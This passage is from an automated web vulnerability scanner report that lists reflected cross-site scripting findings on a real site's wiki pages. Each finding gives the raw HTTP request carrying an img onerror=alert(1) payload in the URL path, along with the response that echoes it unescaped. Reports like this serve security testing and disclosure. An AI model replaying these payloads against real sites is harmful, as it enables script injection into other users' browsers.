<a href="http://www.nuxeo.org/xwiki/bin/export/Mainb6ecb%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E3570ded39b1/NuxeoProdSetup?format=xar&amp;name=Mainb6ecb"><img src=a onerror=alert(1)>3570ded39b1.NuxeoProdSetup&amp;pages=Mainb6ecb">
...[SNIP]...

1.98. http://www.nuxeo.org/xwiki/bin/view/Main/NuxeoProdSetup [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/NuxeoProdSetup

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 5f690<img%20src%3da%20onerror%3dalert(1)>550971a196c was submitted in the REST URL parameter 5. This input was echoed as 5f690<img src=a onerror=alert(1)>550971a196c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/NuxeoProdSetup5f690<img%20src%3da%20onerror%3dalert(1)>550971a196c HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:16:42 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12950
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/Main/NuxeoProdSetup5f690%3Cimg+src%3Da+onerror%3Dalert%281%29%3E550971a196c'>NuxeoProdSetup5f690<img src=a onerror=alert(1)>550971a196c</a>
...[SNIP]...

1.99. http://www.nuxeo.org/xwiki/bin/view/Main/NuxeoProdSetup [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/NuxeoProdSetup

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a30eb"><img%20src%3da%20onerror%3dalert(1)>02bbce0edfd was submitted in the REST URL parameter 5. This input was echoed as a30eb"><img src=a onerror=alert(1)>02bbce0edfd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/NuxeoProdSetupa30eb"><img%20src%3da%20onerror%3dalert(1)>02bbce0edfd HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:44 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13012
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main/NuxeoProdSetupa30eb%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E02bbce0edfd?format=xar&amp;name=Main.NuxeoProdSetupa30eb"><img src=a onerror=alert(1)>02bbce0edfd&amp;pages=Main.NuxeoProdSetupa30eb">
...[SNIP]...

1.100. http://www.nuxeo.org/xwiki/bin/view/Main/QuickStart53 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/QuickStart53

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 95666<img%20src%3da%20onerror%3dalert(1)>e1bfc44a519 was submitted in the REST URL parameter 4. This input was echoed as 95666<img src=a onerror=alert(1)>e1bfc44a519 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main95666<img%20src%3da%20onerror%3dalert(1)>e1bfc44a519/QuickStart53 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:17:14 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12936
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/Main95666%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ee1bfc44a519/">Main95666<img src=a onerror=alert(1)>e1bfc44a519</a>
...[SNIP]...

1.101. http://www.nuxeo.org/xwiki/bin/view/Main/QuickStart53 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/QuickStart53

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce6a9"><img%20src%3da%20onerror%3dalert(1)>8481e731c33 was submitted in the REST URL parameter 4. This input was echoed as ce6a9"><img src=a onerror=alert(1)>8481e731c33 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Maince6a9"><img%20src%3da%20onerror%3dalert(1)>8481e731c33/QuickStart53 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:16:18 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13002
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Maince6a9%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E8481e731c33/QuickStart53?format=xar&amp;name=Maince6a9"><img src=a onerror=alert(1)>8481e731c33.QuickStart53&amp;pages=Maince6a9">
...[SNIP]...

1.102. http://www.nuxeo.org/xwiki/bin/view/Main/QuickStart53 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/QuickStart53

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload b1701<img%20src%3da%20onerror%3dalert(1)>f3296b02031 was submitted in the REST URL parameter 5. This input was echoed as b1701<img src=a onerror=alert(1)>f3296b02031 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/QuickStart53b1701<img%20src%3da%20onerror%3dalert(1)>f3296b02031 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:18:43 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12924
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/Main/QuickStart53b1701%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ef3296b02031'>QuickStart53b1701<img src=a onerror=alert(1)>f3296b02031</a>
...[SNIP]...

1.103. http://www.nuxeo.org/xwiki/bin/view/Main/QuickStart53 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/QuickStart53

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b69f"><img%20src%3da%20onerror%3dalert(1)>e4df32fa359 was submitted in the REST URL parameter 5. This input was echoed as 7b69f"><img src=a onerror=alert(1)>e4df32fa359 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/QuickStart537b69f"><img%20src%3da%20onerror%3dalert(1)>e4df32fa359 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:17:52 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12986
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main/QuickStart537b69f%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ee4df32fa359?format=xar&amp;name=Main.QuickStart537b69f"><img src=a onerror=alert(1)>e4df32fa359&amp;pages=Main.QuickStart537b69f">
...[SNIP]...

1.104. http://www.nuxeo.org/xwiki/bin/view/Main/RssFeeds [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/RssFeeds

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6f559<img%20src%3da%20onerror%3dalert(1)>c8142c250a6 was submitted in the REST URL parameter 4. This input was echoed as 6f559<img src=a onerror=alert(1)>c8142c250a6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main6f559<img%20src%3da%20onerror%3dalert(1)>c8142c250a6/RssFeeds HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:16:47 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12884
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/Main6f559%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ec8142c250a6/">Main6f559<img src=a onerror=alert(1)>c8142c250a6</a>
...[SNIP]...

1.105. http://www.nuxeo.org/xwiki/bin/view/Main/RssFeeds [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/RssFeeds

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44b1d"><img%20src%3da%20onerror%3dalert(1)>62f3be97fdf was submitted in the REST URL parameter 4. This input was echoed as 44b1d"><img src=a onerror=alert(1)>62f3be97fdf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main44b1d"><img%20src%3da%20onerror%3dalert(1)>62f3be97fdf/RssFeeds HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:57 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12950
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main44b1d%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E62f3be97fdf/RssFeeds?format=xar&amp;name=Main44b1d"><img src=a onerror=alert(1)>62f3be97fdf.RssFeeds&amp;pages=Main44b1d">
...[SNIP]...

1.106. http://www.nuxeo.org/xwiki/bin/view/Main/RssFeeds [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/RssFeeds

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54448"><img%20src%3da%20onerror%3dalert(1)>a9dc78f1bed was submitted in the REST URL parameter 5. This input was echoed as 54448"><img src=a onerror=alert(1)>a9dc78f1bed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/RssFeeds54448"><img%20src%3da%20onerror%3dalert(1)>a9dc78f1bed HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:17:15 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12934
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main/RssFeeds54448%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ea9dc78f1bed?format=xar&amp;name=Main.RssFeeds54448"><img src=a onerror=alert(1)>a9dc78f1bed&amp;pages=Main.RssFeeds54448">
...[SNIP]...

1.107. http://www.nuxeo.org/xwiki/bin/view/Main/RssFeeds [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/RssFeeds

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 631e7<img%20src%3da%20onerror%3dalert(1)>6c56452ca3f was submitted in the REST URL parameter 5. This input was echoed as 631e7<img src=a onerror=alert(1)>6c56452ca3f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/RssFeeds631e7<img%20src%3da%20onerror%3dalert(1)>6c56452ca3f HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:18:03 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12872
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/Main/RssFeeds631e7%3Cimg+src%3Da+onerror%3Dalert%281%29%3E6c56452ca3f'>RssFeeds631e7<img src=a onerror=alert(1)>6c56452ca3f</a>
...[SNIP]...

1.108. http://www.nuxeo.org/xwiki/bin/view/Main/Tags [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Tags

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c472"><img%20src%3da%20onerror%3dalert(1)>24ed474cd68 was submitted in the REST URL parameter 4. This input was echoed as 8c472"><img src=a onerror=alert(1)>24ed474cd68 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main8c472"><img%20src%3da%20onerror%3dalert(1)>24ed474cd68/Tags HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:26 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12898
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main8c472%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E24ed474cd68/Tags?format=xar&amp;name=Main8c472"><img src=a onerror=alert(1)>24ed474cd68.Tags&amp;pages=Main8c472">
...[SNIP]...

1.109. http://www.nuxeo.org/xwiki/bin/view/Main/Tags [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Tags

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2faea<img%20src%3da%20onerror%3dalert(1)>80fd4319524 was submitted in the REST URL parameter 4. This input was echoed as 2faea<img src=a onerror=alert(1)>80fd4319524 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main2faea<img%20src%3da%20onerror%3dalert(1)>80fd4319524/Tags HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:16:21 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12832
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/Main2faea%3Cimg+src%3Da+onerror%3Dalert%281%29%3E80fd4319524/">Main2faea<img src=a onerror=alert(1)>80fd4319524</a>
...[SNIP]...

1.110. http://www.nuxeo.org/xwiki/bin/view/Main/Tags [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Tags

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f901e<img%20src%3da%20onerror%3dalert(1)>63acc2cbc28 was submitted in the REST URL parameter 5. This input was echoed as f901e<img src=a onerror=alert(1)>63acc2cbc28 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/Tagsf901e<img%20src%3da%20onerror%3dalert(1)>63acc2cbc28 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:17:59 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12820
